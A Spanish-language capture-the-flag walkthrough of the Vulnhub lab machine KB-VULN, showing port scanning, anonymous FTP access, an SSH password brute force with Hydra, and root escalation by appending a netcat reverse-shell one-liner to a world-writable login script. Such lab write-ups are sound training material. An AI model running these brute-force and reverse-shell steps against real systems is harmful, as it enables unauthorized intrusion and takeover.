Hoy vamos a hackear la maquina de Vulnhub llamada KB-VULN. Podeis descargarla desde el siguiente enlace: KB-VULN



Empezamos con un nmap para ver que puertos tiene abiertos.

~ > nmap -A -p-                                                  
Starting Nmap 7.70 ( https://nmap.org ) at 2020-09-10 10:52 CEST
Nmap scan report for
Host is up (0.00064s latency).
Not shown: 65532 closed ports
21/tcp open  ftp     vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 5
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 
| ssh-hostkey: 
|   2048 95:84:46:ae:47:21:d1:73:7d:2f:0a:66:87:98:af:d3 (RSA)
|   256 af:79:86:77:00:59:3e:ee:cf:6e:bb:bc:cb:ad:96:cc (ECDSA)
|_  256 9d:4d:2a:a1:65:d4:f2:bd:5b:25:22:ec:bc:6f:66:97 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: OneSchool — Website by Colorlib
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.87 seconds
Vemos que tiene abiertos los puerto del FTP, SSH y HTTP. En el codigo fuente de la pagina web inicial podemos encontrar el siguiente comentario:

Username : sysadmin 
Por otro lado, nos conectamos al ftp usando los credenciales anonymous/anonymous.

~/KB > ftp
Connected to
220 (vsFTPd 3.0.3)
Name ( anonymous
331 Please specify the password.
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxr-x    2 1000     1000         4096 Aug 22 17:39 .
drwxrwxr-x    2 1000     1000         4096 Aug 22 17:39 ..
-rw-r--r--    1 0        0              54 Aug 22 17:39 .bash_history
226 Directory send OK.
Vemos que hay un fichero .bash_history. Lo descargamos.

ftp> get .bash_history
local: .bash_history remote: .bash_history
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for .bash_history (54 bytes).
226 Transfer complete.
54 bytes received in 0.00 secs (73.3441 kB/s)
Echamos un vistazo al contenido del fichero...

~/KB > cat .bash_history                                                      
cd /etc/update-motd.d/
nano 00-header
Vemos que "edita" el fichero 00-header. Dicho fichero solo lo deberia poder editar root, ya que se ejecuta cada vez que alguien se loguea al sistema. Si conseguimos acceso al sistema, y podemos editar el fichero, podemos utilizarlo para elevar nuestros privilegios. Como no podemos ir por ningun otro lado, hacemos bruteforce por SSH al usuario que hemos encontrado en el comentario de la web, sysadmin.

~ > hydra -l sysadmin -P /usr/share/wordlists/rockyou.txt ssh
Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret 
service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-09-10 
[WARNING] Many SSH configurations limit the number of parallel tasks, it is 
recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip 
waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries 
(l:1/p:14344398), ~896525 tries per task
[DATA] attacking ssh://
[22][ssh] host:   login: sysadmin   password: password1
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-09-10 
Encontramos la password :) Nos logueamos!

Low Shell

~ > ssh sysadmin@                                                 
sysadmin@'s password: 


Last login: Sat Aug 22 18:00:48 2020
To run a command as administrator (user "root"), use "sudo ".
See "man sudo_root" for details.


sysadmin@kb-server:~$ ls -la
total 40
drwxr-xr-x 5 sysadmin sysadmin 4096 Aug 22 18:04 .
drwxr-xr-x 3 root     root     4096 Aug 22 17:53 ..
-rw------- 1 sysadmin sysadmin   16 Aug 22 18:04 .bash_history
-rw-r--r-- 1 sysadmin sysadmin  220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 sysadmin sysadmin 3771 Apr  4  2018 .bashrc
drwx------ 2 sysadmin sysadmin 4096 Aug 22 17:02 .cache
drwxrwxr-x 2 sysadmin sysadmin 4096 Aug 22 17:39 ftp
drwx------ 3 sysadmin sysadmin 4096 Aug 22 17:02 .gnupg
-rw-r--r-- 1 sysadmin sysadmin  807 Apr  4  2018 .profile
-rw-r--r-- 1 root     root       33 Aug 22 17:54 user.txt
sysadmin@kb-server:~$ cat user.txt

Privilege Escalation

Miramos si podemos modificar el fichero 00-header como hemos visto anteriormente...

sysadmin@kb-server:~$ ls -l /etc/update-motd.d/00-header 
-rwxrwxrwx 1 root root 989 Aug 22 17:08 /etc/update-motd.d/00-header
Vemos que si :) Lo editamos para agregar una linea al final, que nos de una reverse shell a nuestra maquina con privilegios!

sysadmin@kb-server:~$ nano /etc/update-motd.d/00-header
echo "\n\t\t\tWELCOME TO THE KB-SERVER\n"
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 8888 >/tmp/f
Ponemos nc a la escucha.

~ > nc -nlvp 8888                                                            
listening on [any] 8888 ...
Nos logueamos de nuevo con el usuario y obtemos la reverse shell...

~ > nc -nlvp 8888                                                         
listening on [any] 8888 ...
connect to [] from (UNKNOWN) [] 52826
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)


# cd /root
# ls
# cat flag.txt


Y con esto ya seriamos root de la maquina.